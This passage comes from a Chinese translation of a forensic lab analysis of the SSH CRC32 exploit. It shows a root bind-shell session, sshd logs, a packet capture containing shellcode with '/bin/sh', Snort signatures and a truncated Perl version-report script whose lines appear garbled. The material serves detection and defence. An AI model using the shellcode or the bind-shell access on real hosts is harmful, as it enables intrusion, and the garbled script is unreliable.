0.0.0.0:22 0.0.0.0:* LISTEN raw 0 0 0.0.0.0:1 0.0.0.0:* 7 raw 0 0 0.0.0.0:6 0.0.0.0:* 7 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 而使用LiSt Open Files ("lsof")[4]工具顯示被測試的SSH守護程序開啓了一個 新的監聽端口: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [root@victim /root]# lsof -p 9364 COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME sshd 9364 root cwd DIR 3,3 1024 2 / sshd 9364 root rtd DIR 3,3 1024 2 / sshd 9364 root txt REG 3,3 655038 442413 /usr/local/src/ssh-1.2.31/sbin/sshd1 sshd 9364 root mem REG 3,3 340771 30722 /lib/ld-2.1.3.so sshd 9364 root mem REG 3,3 370141 31107 /lib/libnsl-2.1.3.so sshd 9364 root mem REG 3,3 66231 31103 /lib/libcrypt-2.1.3.so sshd 9364 root mem REG 3,3 47008 31113 /lib/libutil-2.1.3.so sshd 9364 root mem REG 3,3 4101836 31102 /lib/libc-2.1.3.so sshd 9364 root mem REG 3,3 246652 31109 /lib/libnss_files-2.1.3.so sshd 9364 root mem REG 3,3 252234 31111 /lib/libnss_nisplus-2.1.3.so sshd 9364 root mem REG 3,3 255963 31110 /lib/libnss_nis-2.1.3.so sshd 9364 root mem REG 3,3 67580 31108 /lib/libnss_dns-2.1.3.so sshd 9364 root mem REG 3,3 169720 31112 /lib/libresolv-2.1.3.so sshd 9364 root 0u CHR 1,3 4110 /dev/null sshd 9364 root 1u CHR 1,3 4110 /dev/null sshd 9364 root 2u CHR 1,3 4110 /dev/null sshd 9364 root 3u inet 10202 TCP *:12345 (LISTEN) sshd 9364 root 4u inet 10197 TCP 10.10.10.3:2222->10.10.10.10:33190 (CLOSE_WAIT) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 很明顯,攻擊程序成功利用此漏洞獲得ROOT SHELL,並綁定了一個高端TCP端口。 這樣攻擊者可以使用任何"telnet"或者"rc"工具連接到此端口並以超級用戶的 方式執行任意命令,如下所示: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= root@plac ~ >> telnet 10.10.10.3 12345 Trying 10.10.10.3... Connected to 10.10.10.3. Escape character is '^]'. id; uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) date; Thu Nov 1 18:04:42 PST 2001 netstat -an --inet; Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 10.10.10.3:12345 10.10.10.10:33077 ESTABLISHED tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN tcp 1252 0 10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN raw 0 0 0.0.0.0:1 0.0.0.0:* 7 raw 0 0 0.0.0.0:6 0.0.0.0:* 7 exit; Connection closed by foreign host. root@plac ~ >> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [注重]:使用telnet要加";"號,而nc連接不需要。 等攻擊者退出以後,被測試系統網絡狀態返回正常: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [root@victim /root]# netstat -an --inet Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN raw 0 0 0.0.0.0:1 0.0.0.0:* 7 raw 0 0 0.0.0.0:6 0.0.0.0:* 7 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 假如syslog日志功能開啓了,連接和暴力測試的信息全部會記錄下來(注重,這個是 對SSH.com 1.2.31在Red Hat LInux 6.0上的測試 -- 日志標志會和記錄OpenSSH 不一樣): =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Nov 1 18:46:14 victim sshd[9510]: log: Connection from 10.10.10.10 port 33298 Nov 1 18:46:19 victim sshd[9511]: log: Connection from 10.10.10.10 port 33299 Nov 1 18:46:22 victim sshd[9512]: log: Connection from 10.10.10.10 port 33300 Nov 1 18:46:26 victim sshd[9513]: log: Connection from 10.10.10.10 port 33301 Nov 1 18:46:31 victim sshd[9515]: log: Connection from 10.10.10.10 port 33302 Nov 1 18:46:35 victim sshd[9516]: log: Connection from 10.10.10.10 port 33303 Nov 1 18:46:39 victim sshd[9517]: log: Connection from 10.10.10.10 port 33304 Nov 1 18:46:43 victim sshd[9518]: log: Connection from 10.10.10.10 port 33305 Nov 1 18:46:47 victim sshd[9518]: fatal: Local: Corrupted check bytes on input. Nov 1 18:46:47 victim sshd[9519]: log: Connection from 10.10.10.10 port 33306 Nov 1 18:46:52 victim sshd[9519]: fatal: Connection closed by remote host. Nov 1 18:46:53 victim sshd[9520]: log: Connection from 10.10.10.10 port 33307 Nov 1 18:46:57 victim sshd[9521]: log: Connection from 10.10.10.10 port 33308 Nov 1 18:47:01 victim sshd[9522]: log: Connection from 10.10.10.10 port 33309 Nov 1 18:47:06 victim sshd[9523]: log: Connection from 10.10.10.10 port 33310 Nov 1 18:47:10 victim sshd[9524]: log: Connection from 10.10.10.10 port 33311 Nov 1 18:47:14 victim sshd[9525]: log: Connection from 10.10.10.10 port 33312 Nov 1 18:47:19 victim sshd[9526]: log: Connection from 10.10.10.10 port 33313 Nov 1 18:47:24 victim sshd[9527]: log: Connection from 10.10.10.10 port 33314 Nov 1 18:47:24 victim sshd[9527]: fatal: Connection closed by remote host. Nov 1 18:47:46 victim sshd[9528]: log: Connection from 10.10.10.10 port 33315 Nov 1 18:47:46 victim sshd[9529]: log: Connection from 10.10.10.10 port 33316 Nov 1 18:47:47 victim sshd[9530]: log: Connection from 10.10.10.10 port 33317 Nov 1 18:47:47 victim sshd[9531]: log: Connection from 10.10.10.10 port 33318 Nov 1 18:47:47 victim sshd[9532]: log: Connection from 10.10.10.10 port 33319 Nov 1 18:47:48 victim sshd[9533]: log: Connection from 10.10.10.10 port 33320 Nov 1 18:47:48 victim sshd[9534]: log: Connection from 10.10.10.10 port 33321 Nov 1 18:47:48 victim sshd[9535]: log: Connection from 10.10.10.10 port 33322 Nov 1 18:47:49 victim sshd[9536]: log: Connection from 10.10.10.10 port 33323 Nov 1 18:47:49 victim sshd[9537]: log: Connection from 10.10.10.10 port 33324 Nov 1 18:47:50 victim sshd[9538]: log: Connection from 10.10.10.10 port 33325 Nov 1 18:47:50 victim sshd[9539]: log: Connection from 10.10.10.10 port 33326 Nov 1 18:47:50 victim sshd[9540]: log: Connection from 10.10.10.10 port 33327 Nov 1 18:47:51 victim sshd[9541]: log: Connection from 10.10.10.10 port 33328 Nov 1 18:47:51 victim sshd[9542]: log: Connection from 10.10.10.10 port 33329 Nov 1 18:47:51 victim sshd[9543]: log: Connection from 10.10.10.10 port 33330 Nov 1 18:47:52 victim sshd[9544]: log: Connection from 10.10.10.10 port 33331 Nov 1 18:47:52 victim sshd[9545]: log: Connection from 10.10.10.10 port 33332 Nov 1 18:47:52 victim sshd[9546]: log: Connection from 10.10.10.10 port 33333 Nov 1 18:47:53 victim sshd[9547]: log: Connection from 10.10.10.10 port 33334 Nov 1 18:47:53 victim sshd[9548]: log: Connection from 10.10.10.10 port 33335 Nov 1 18:47:54 victim sshd[9549]: log: Connection from 10.10.10.10 port 33336 Nov 1 18:47:54 victim sshd[9550]: log: Connection from 10.10.10.10 port 33337 Nov 1 18:47:54 victim sshd[9551]: log: Connection from 10.10.10.10 port 33338 Nov 1 18:47:55 victim sshd[9552]: log: Connection from 10.10.10.10 port 33339 Nov 1 18:47:55 victim sshd[9553]: log: Connection from 10.10.10.10 port 33340 Nov 1 18:47:55 victim sshd[9554]: log: Connection from 10.10.10.10 port 33341 Nov 1 18:47:56 victim sshd[9555]: log: Connection from 10.10.10.10 port 33342 Nov 1 18:47:56 victim sshd[9556]: log: Connection from 10.10.10.10 port 33343 Nov 1 18:47:56 victim sshd[9555]: fatal: Local: Corrupted check bytes on input. Nov 1 18:47:57 victim sshd[9557]: log: Connection from 10.10.10.10 port 33344 Nov 1 18:47:57 victim sshd[9558]: log: Connection from 10.10.10.10 port 33345 Nov 1 18:47:57 victim sshd[9559]: log: Connection from 10.10.10.10 port 33346 Nov 1 18:47:58 victim sshd[9560]: log: Connection from 10.10.10.10 port 33347 Nov 1 18:47:58 victim sshd[9561]: log: Connection from 10.10.10.10 port 33348 Nov 1 18:47:59 victim sshd[9562]: log: Connection from 10.10.10.10 port 33349 Nov 1 18:47:59 victim sshd[9563]: log: Connection from 10.10.10.10 port 33350 Nov 1 18:47:59 victim sshd[9564]: log: Connection from 10.10.10.10 port 33351 Nov 1 18:48:00 victim sshd[9565]: log: Connection from 10.10.10.10 port 33352 Nov 1 18:48:00 victim sshd[9566]: log: Connection from 10.10.10.10 port 33353 Nov 1 18:48:00 victim sshd[9567]: log: Connection from 10.10.10.10 port 33354 Nov 1 18:48:01 victim sshd[9568]: log: Connection from 10.10.10.10 port 33355 Nov 1 18:48:01 victim sshd[9569]: log: Connection from 10.10.10.10 port 33356 Nov 1 18:48:02 victim sshd[9570]: log: Connection from 10.10.10.10 port 33357 Nov 1 18:48:02 victim sshd[9571]: log: Connection from 10.10.10.10 port 33358 Nov 1 18:48:02 victim sshd[9572]: log: Connection from 10.10.10.10 port 33359 Nov 1 18:48:03 victim sshd[9573]: log: Connection from 10.10.10.10 port 33360 Nov 1 18:48:03 victim sshd[9574]: log: Connection from 10.10.10.10 port 33361 Nov 1 18:48:03 victim sshd[9575]: log: Connection from 10.10.10.10 port 33362 Nov 1 18:48:04 victim sshd[9576]: log: Connection from 10.10.10.10 port 33363 Nov 1 18:48:04 victim sshd[9577]: log: Connection from 10.10.10.10 port 33364 Nov 1 18:48:04 victim sshd[9578]: log: Connection from 10.10.10.10 port 33365 Nov 1 18:48:05 victim sshd[9579]: log: Connection from 10.10.10.10 port 33366 Nov 1 18:48:05 victim sshd[9580]: log: Connection from 10.10.10.10 port 33367 Nov 1 18:48:06 victim sshd[9581]: log: Connection from 10.10.10.10 port 33368 Nov 1 18:48:06 victim sshd[9582]: log: Connection from 10.10.10.10 port 33369 Nov 1 18:48:06 victim sshd[9583]: log: Connection from 10.10.10.10 port 33370 Nov 1 18:48:07 victim sshd[9584]: log: Connection from 10.10.10.10 port 33371 Nov 1 18:48:07 victim sshd[9585]: log: Connection from 10.10.10.10 port 33372 Nov 1 18:48:07 victim sshd[9586]: log: Connection from 10.10.10.10 port 33373 Nov 1 18:48:08 victim sshd[9587]: log: Connection from 10.10.10.10 port 33374 Nov 1 18:48:08 victim sshd[9586]: fatal: Local: crc32 compensation attack: network attack detected Nov 1 18:48:08 victim sshd[9588]: log: Connection from 10.10.10.10 port 33375 Nov 1 18:48:08 victim sshd[9587]: fatal: Local: crc32 compensation attack: network attack detected Nov 1 18:48:08 victim sshd[9589]: log: Connection from 10.10.10.10 port 33376 Nov 1 18:48:08 victim sshd[9588]: fatal: Local: crc32 compensation attack: network attack detected Nov 1 18:48:09 victim sshd[9590]: log: Connection from 10.10.10.10 port 33377 Nov 1 18:48:09 victim sshd[9589]: fatal: Local: crc32 compensation attack: network attack detected Nov 1 18:48:09 victim sshd[9591]: log: Connection from 10.10.10.10 port 33378 Nov 1 18:48:09 victim sshd[9590]: fatal: Local: crc32 compensation attack: network attack detected Nov 1 18:48:09 victim sshd[9592]: log: Connection from 10.10.10.10 port 33379 Nov 1 18:48:09 victim sshd[9591]: fatal: Local: crc32 compensation attack: network attack detected Nov 1 18:48:10 victim sshd[9592]: fatal: Local: crc32 compensation attack: network attack detected Nov 1 18:48:10 victim sshd[9593]: log: Connection from 10.10.10.10 port 33380 Nov 1 18:48:10 victim sshd[9594]: log: Connection from 10.10.10.10 port 33381 Nov 1 18:48:10 victim sshd[9593]: fatal: Local: crc32 compensation attack: network attack detected Nov 1 18:48:11 victim sshd[9595]: log: Connection from 10.10.10.10 port 33382 Nov 1 18:48:11 victim sshd[9594]: fatal: Local: crc32 compensation attack: network attack detected Nov 1 18:48:11 victim sshd[9596]: log: Connection from 10.10.10.10 port 33383 Nov 1 18:48:11 victim sshd[9597]: log: Connection from 10.10.10.10 port 33384 Nov 1 18:48:11 victim sshd[9596]: fatal: Local: crc32 compensation attack: network attack detected Nov 1 18:48:12 victim sshd[9598]: log: Connection from 10.10.10.10 port 33385 Nov 1 18:48:12 victim sshd[9597]: fatal: Local: crc32 compensation attack: network attack detected Nov 1 18:48:12 victim sshd[9599]: log: Connection from 10.10.10.10 port 33386 Nov 1 18:48:12 victim sshd[9598]: fatal: Local: crc32 compensation attack: network attack detected Nov 1 18:48:12 victim sshd[9600]: log: Connection from 10.10.10.10 port 33387 Nov 1 18:48:12 victim sshd[9599]: fatal: Local: crc32 compensation attack: network attack detected Nov 1 18:48:13 victim sshd[9601]: log: Connection from 10.10.10.10 port 33388 Nov 1 18:48:13 victim sshd[9602]: log: Connection from 10.10.10.10 port 33389 Nov 1 18:48:13 victim sshd[9603]: log: Connection from 10.10.10.10 port 33390 Nov 1 18:48:14 victim sshd[9604]: log: Connection from 10.10.10.10 port 33391 Nov 1 18:48:14 victim sshd[9605]: log: Connection from 10.10.10.10 port 33392 Nov 1 18:48:15 victim sshd[9606]: log: Connection from 10.10.10.10 port 33393 Nov 1 18:48:15 victim sshd[9605]: fatal: Local: Corrupted check bytes on input. Nov 1 18:48:15 victim sshd[9607]: log: Connection from 10.10.10.10 port 33394 Nov 1 18:48:16 victim sshd[9608]: log: Connection from 10.10.10.10 port 33395 Nov 1 18:48:16 victim sshd[9609]: log: Connection from 10.10.10.10 port 33396 Nov 1 18:48:16 victim sshd[9610]: log: Connection from 10.10.10.10 port 33397 Nov 1 18:48:17 victim sshd[9611]: log: Connection from 10.10.10.10 port 33398 Nov 1 18:48:17 victim sshd[9611]: fatal: Local: Corrupted check bytes on input. Nov 1 18:48:17 victim sshd[9612]: log: Connection from 10.10.10.10 port 33399 Nov 1 18:48:18 victim sshd[9613]: log: Connection from 10.10.10.10 port 33400 Nov 1 18:48:18 victim sshd[9614]: log: Connection from 10.10.10.10 port 33401 Nov 1 18:58:18 victim sshd[9614]: fatal: Timeout before authentication. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 注重日志條目的最後一條,假如成功利用此漏洞被入侵,認證過程就會停止,因爲 此時SHELLCODE的後門程序已經執行,這樣你可以連接端口進行任何操作。唯一的 問題是,SSH守護程序(至少SSH.com 1.2.31)會由于認證過程不完整而超時,導致 關閉開啓的SHELL。一般在監聽shell的父進程關閉只前會有10分鍾時間空域。 網絡通信信息分析 ===================== 在這裏使用了Tcpdump來截獲上面的攻擊行爲,記錄信息在sshdx.dump,可以被用 來IDS入侵檢測系統獲得攻擊標志信息。假如你的IDS系統不支持tcpdump文件,你 可以使用"tcpreplay"[12]來轉換tcpdump信息。 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # tcpdump -s1500 -w sshdx.dump ip host 10.10.10.3 & =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 這樣可以很輕易的查看SSH守護程序産生的多個連接信息,使用"ngrep"[5]工具可以 辨認出最後連接和插入SHELLCODE的暴力破解攻擊信息: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= . . . T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP] SSH-1.5-1.2.31. T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP] SSH-1.5-OpenSSH_2.2.0p1. T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP] ............GA..@.......%....`..P.....D&..2.+7#...1!?..c.r).8.^.h..... ..I..b6..9.f........N..0....:BAh@s.e...H......(.D2.Zg......#.......\.j W...O$....6.......$...V..;...U.@Y.K2.p<\..o..?..l.........*.p.K<s..,.. .@7.wBBy......1.i..%".....G*g.G.t(......M........[.......J......<. T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP] ............GA..@.....`G.Fg.g.!.i.}..........._.e....=../..6....;....) T.....|c...#W.\wve.cy .n.....q.Sc....}..".N.G.w"....n.../#.....8x..&.Z ....Q/.......8.. T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP] .........4.. T 10.10.10.10:32957 -> 10.10.10.3:2222 [A] ..W...2.......2.......2.......2.......2.......2.......2.......2....... 2.......2.......2.......2.......2.......2.......2.......2.......2 .... ..2!......2$......2%......2(......2)......2,......2-......20......21.. ....24......25......28......29......2<......2=......2@......2A......2D ......2E......2H......2I......2L......2M......2P......2Q......2T...... 2U......2X......2Y......2\......2]......2`......2a......2d......2e.... ..2h......2i......2l......2m......2p......2q......2t......2u......2x.. ....2y......2|......2}......2.......2.......2.......2.......2.......2. ......2.......2.......2.......2.......2.......2.......2.......2....... 2.......2.......2.......2.......2.......2.......2.......2.......2..... ..2.......2.......2.......2.......2.......2.......2.......2.......2... ....2.......2.......2.......2.......2.......2.......2.......2.......2. ......2.......2.......2.......2.......2.......2.......2.......2....... 2.......2.......2.......2.......2.......2.......2.......2.......2..... ..2.......2.......2.......2.......2.......2.......3.......3.......3... ....3.......3.......3.......3.......3.......3.......3.......3.......3. ......3.......3.......3.......3.......3 ......3!......3$......3%...... 3(......3)......3,......3-......30......31......34......35......38.... ..39......3<......3=......3@......3A......3D......3E......3H......3I.. ....3L......3M......3P......3Q......3T......3U......3X......3Y......3\ ......3]......3`......3a......3d........1...p}.@ T 10.10.10.10:32957 -> 10.10.10.3:2222 [A] ......3i......3l......3m......3p......3q......3t......3u......3x...... 3y......3|......3}......3.......3.......3.......3.......3.......3..... ..3.......3.......3.......3.......3.......3.......3.......3.......3... ....3.......3.......3.......3.......3.......3.......3.......3.......3. ......3.......3.......3.......3.......3.......3.......3.......3....... 3.......3.......3.......3.......3.......3.......3.......3.......3..... ..3.......3.......3.......3.......3.......3.......3.......3.......3... ....3.......3.......3.......3.......3.......3.......3.......3.......3. ......3.......3.......3.......3.......3.......4.......4.......4....... 4.......4.......4.......4.......4.......4.......4.......4.......4..... ..4.......4.......4.......4.......4 ......4!......4$......4%......4(.. ....4)......4,......4-......40......41......44......45......48......49 ......4<......4=......4@......4A......4D......4E......4H......4I...... 4L......4M......4P......4Q......4T......4U......4X......4Y......4\.... ..4]......4`......4a......4d......4e......4h......4i......4l......4m.. ....4p......4q......4t......4u......4x......4y......4|......4}......4. ......4.......4.......4.......4.......4.......4.......4.......4....... 4.......4.......4.......4.......4.......4.......4.......4.......4..... ..4.......4.......4.......4.......4.......4.......4.......4.......4... ....4.......4.......4.......4.......4.......4.......4.......4.......4. ......4.......4.......4.......4.........1...p}.@ . . . T 10.10.10.10:32957 -> 10.10.10.3:2222 [A] ...................................................................... ...................................................................... ...................................................................... ...................................................................... ...................................................................... ...................................................................... ...................................................................... ...................................................................... .....................1..f..1...C.].C.].K.M..M...1..E.Cf.].f.E.09.M..E. .E..E.....M.....CC....C....1..?......A....^.u.1..F..E......M..U....... ./bin/sh.h0h0h0, 7350, zip/TESO!...................................... ...................................................................... ...................................................................... ...................................................................... ...................................................................... ...................................................................... ...................................................................... ...................................................................... ...................................................................... ...................................................................... ........................................1...p}.@ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 這樣針對這個攻擊程序你可以匹配如下字符串"h0h0h0, 7350, zip/TESO!" [7] 和NOP等。 下面的特征字符串由Marty Roesch 和 Brian Caswell開發並可使用在Snort v1.8 或者 更高的版本[6]: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \  (msg:"EXPLOIT ssh CRC32 overflow /bin/sh"; \  flags:A+; content:"/bin/sh"; \  reference:bugtraq,2347; reference:cve,CVE-2001-0144; \  classtype:shellcode-detect;) alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \  (msg:"EXPLOIT ssh CRC32 overflow filler"; \  flags:A+; content:"|00 00 00 00 00 00 00 00 00 00 00 00 00|"; \  reference:bugtraq,2347; reference:cve,CVE-2001-0144; \  classtype:shellcode-detect;) alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \  (msg:"EXPLOIT ssh CRC32 overflow NOOP"; \  flags:A+; content:"|90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90|"; \  reference:bugtraq,2347; reference:cve,CVE-2001-0144; \  classtype:shellcode-detect;) alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \  (msg:"EXPLOIT ssh CRC32 overflow"; \  flags:A+; content:"|00 01 57 00 00 00 18|"; offset:0; depth:7; \  content:"|FF FF FF FF 00 00|"; offset:8; depth:14; \  reference:bugtraq,2347; reference:cve,CVE-2001-0144; \  classtype:shellcode-detect;) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 鑒別你的主機是否存在此漏洞 =========================== 你可以使用Jeremy Mates' scan_ssh.pl[8] 和 Niels Provos' ScanSSH scanner[9] 寫的腳本來鑒別SSH服務和它們的版本。 Russell Fulton 也公布了一個腳本程序Argus[10]用來處理日志,包含在下面的附錄中。 ---------------------------------------------------------------------------- 參考 ======== [1] Portable Linux Amazing CD (PLAC) v2.9.1pre2, by Fred Cohen  http://www.all.net/ForensiX/plac.html [2] Netcat, by der Hobbit  http://www.l0pht.com/~weld/netcat/ [3] Reverse Engineer's Query Tool  http://packetstormsecurity.org/linux/reverse-engineering/reqt-0.7f.tar.gz [4] LiSt Open Files (lsof)  http://sunsite.securitycentralhq.com/mirrors/security/lsof/lsof.tar.gz [5] ngrep, by Jordan Ritter  http://www.packetfactory.net/projects/ngrep/ [6] Snort  http://www.snort.org/ [7] 7350.org / 7350  http://www.7350.org/  http://www.team-teso.org/about.php (see the bottom) [8] Jeremy Mates 提供的ssh_scan.pl  http://sial.org/code/perl/scripts/ssh_scan.pl.html [9] Niels Provos提供的ScanSSH 掃描程序  http://www.monkey.org/~provos/scanssh/ [10] Argus - 網絡傳輸審核工具  http://www.pl.freebsd.org/es/ports/net.html#argus-1.8.1 [11] tcpdump  http://staff.washington.edu/dittrich/misc/sshdx.dump [12] tcpreplay  http://packages.debian.org/testing/net/tcpreplay.html Appendix A ========== 兩個掃描腳本如下 =-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= #!/usr/bin/perl # # ssh-report # # Dave Dittrich <dittrich@cac.washington.edu> # Thu Nov 8 21:39:20 PST 2001 # # Process output of scans for SSH servers, with version identifying # information, into two level break report format by SSH version. # # This script operates on a list of scan results that look # like this: # # % cat scanresults # 10.0.0.1 beavertail.dept.foo.edu SSH-1.5-1.2.31 # 10.0.0.2 lumpysoup.dept.foo.edu SSH-1.5-1.2.31 # 10.0.0.3 marktwain.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2 # 10.0.0.4 junebug.dept.foo.edu SSH-1.5-1.2.31 # 10.0.0.10 calvin.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2 # 10.0.0.11 hobbes.dept.foo.edu SSH-1.99-OpenSSH_2.1.1 # 10.0.0.20 willow.dept.foo.edu SSH-1.99-OpenSSH_2.9p2 # 10.0.0.21 berry.dept.foo.edu SSH-1.99-OpenSSH_2.9p2 # 10.0.0.23 whimpy.dept.foo.edu SSH-1.99-OpenSSH_2.9p2 # # The resulting report (without the "-a" flag) will look like this: # # % ssh-report < scanresults # # SSH-1.5-1.2.31 (affected) # beavertail.dept.foo.edu(10.0.0.1) # lumpysoup.dept.foo.edu(10.0.0.2) # junebug.dept.foo.edu(10.0.0.4) # # # SSH-1.99-OpenSSH_2.1.1 (affected) # hobbes.dept.foo.edu(10.0.0.11) # # By default, this script will only report on those systems that # are running potentially vulnerable SSH servers. Use the "-a" # option to report on all servers. Use "grep -v" to filter out # hosts *before* you run them through this reporting script. # # SSH servers are considered "affected" if they are known, by being # listed in one or more of the following references, to have the crc32 # compensation attack detector vulnerability: # # http://www.kb.cert.org/vuls/id/945216 # http://www.securityfocus.com/bid/2347/ # http://xforce.iss.net/alerts/advise100.php # http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm # # You also may need to adjust the logic below to lump systems # into the "Unknown" category correctly (e.g., if your server # has a custom version string, Access control, etc.) # # The list below of servers and potential vulnerability was derived by # summarizing existing versions on a set of production networks and # using the advisories and reference material listed above. You # should update this list as new information is oBTained, or if new # versions of the SSH server are found on your network. %affected = ( 'Unknown', 'unknown', 'SSH-1.4-1.2.14', 'not affected', 'SSH-1.4-1.2.15', 'not affected', 'SSH-1.4-1.2.16', 'not affected', 'SSH-1.5-1.2.17', 'not affected', 'SSH-1.5-1.2.18', 'not affected', 'SSH-1.5-1.2.19', 'not affected', 'SSH-1.5-1.2.20', 'not affected', 'SSH-1.5-1.2.21', 'not affected', 'SSH-1.5-1.2.22', 'not affected', 'SSH-1.5-1.2.23', 'not affected', 'SSH-1.5-1.2.24', 'affected', 'SSH-1.5-1.2.25', 'affected', 'SSH-1.5-1.2.26', 'affected', 'SSH-1.5-1.2.27', 'affected', 'SSH-1.5-1.2.28', 'affected', 'SSH-1.5-1.2.29', 'affected', 'SSH-1.5-1.2.30', 'affected', 'SSH-1.5-1.2.31', 'affected', 'SSH-1.5-1.2.31a', 'not affected', 'SSH-1.5-1.2.32', 'not affected', 'SSH-1.5-1.3.7', 'not affected', 'SSH-1.5-Cisco-1.25', 'unknown', 'SSH-1.5-OSU_1.5alpha1', 'unknown', 'SSH-1.5-OpenSSH-1.2', 'affected', 'SSH-1.5-OpenSSH-1.2.1', 'affected', 'SSH-1.5-OpenSSH-1.2.2', 'affected', 'SSH-1.5-OpenSSH-1.2.3', 'affected', 'SSH-1.5-OpenSSH_2.5.1', 'not affected', 'SSH-1.5-OpenSSH_2.5.1p1', 'not affected', 'SSH-1.5-OpenSSH_2.9p1', 'not affected', 'SSH-1.5-OpenSSH_2.9p2', 'not affected', 'SSH-1.5-RemotelyAnywhere', 'not affected', 'SSH-1.99-2.0.11', 'affected w/Version 1 fallback', 'SSH-1.99-2.0.12', 'affected w/Version 1 fallback', 'SSH-1.99-2.0.13', 'affected w/Version 1 fallback', 'SSH-1.99-2.1.0.pl2', 'affected w/Version 1 fallback', 'SSH-1.99-2.1.0', 'affected w/Version 1 fallback', 'SSH-1.99-2.2.0', 'affected w/Version 1 fallback', 'SSH-1.99-2.3.0', 'affected w/Version 1 fallback', 'SSH-1.99-2.4.0', 'affected w/Version 1 fallback', 'SSH-1.99-3.0.0', 'affected w/Version 1 fallback', 'SSH-1.99-3.0.1', 'affected w/Version 1 fallback', 'SSH-1.99-OpenSSH-2.1', 'affected', 'SSH-1.99-OpenSSH_2.1.1', 'affected', 'SSH-1.99-OpenSSH_2.2.0', 'affected', 'SSH-1.99-OpenSSH_2.2.0p1', 'affected', 'SSH-1.99-OpenSSH_2.3.0', 'not affected', 'SSH-1.99-OpenSSH_2.3.0p1', 'not affected', 'SSH-1.99-OpenSSH_2.5.1', 'not affected', 'SSH-1.99-OpenSSH_2.5.1p1', 'not affected', 'SSH-1.99-OpenSSH_2.5.1p2', 'not affected', 'SSH-1.99-OpenSSH_2.5.2p2', 'not affected', 'SSH-1.99-OpenSSH_2.9.9p2', 'not affected', 'SSH-1.99-OpenSSH_2.9', 'not affected', 'SSH-1.99-OpenSSH_2.9p1', 'not affected', 'SSH-1.99-OpenSSH_2.9p2', 'not affected', 'SSH-1.99-OpenSSH_3.0p1', 'not affected', 'SSH-2.0-1.1.1', 'unknown', 'SSH-2.0-2.3.0', 'affected w/Version 1 fallback', 'SSH-2.0-2.4.0', 'affected w/Version 1 fallback', 'SSH-2.0-3.0.0', 'affected w/Version 1 fallback', 'SSH-2.0-3.0.1', 'affected w/Version 1 fallback', 'SSH-2.0-OpenSSH_2.5.1p1', 'not affected', 'SSH-2.0-OpenSSH_2.5.2p2', 'not affected', 'SSH-2.0-OpenSSH_2.9.9p2', 'not affected', 'SSH-2.0-OpenSSH_2.9p2', 'not affected', ); # Make SURE you read the code first. &IKnowWhatImDoing(); $all++, shift(@ARGV) if $ARGV[0] eq "-a"; while (<>) {  chop;  s/\s+/ /g;  ($ip, $host, $version) = split(' ', $_);  # Adjust this to identify other strings reported  # by servers that have access restrictions, etc.  # in place and do not show a specific version number.  # They all fall under the category "Unknown" in this case.  $version = "Unknown"  if ($version eq "Couldn't" ||  $version eq "Unknown" ||  $version eq "You" ||  $version eq "timeout");  $server = $host; } foreach $i (sort keys %server) {  ($version,$ip) = split(":", $i);  next if ($affected eq "not affected" && ! $all);  printf("\n\n%s (%s)\n", $version, 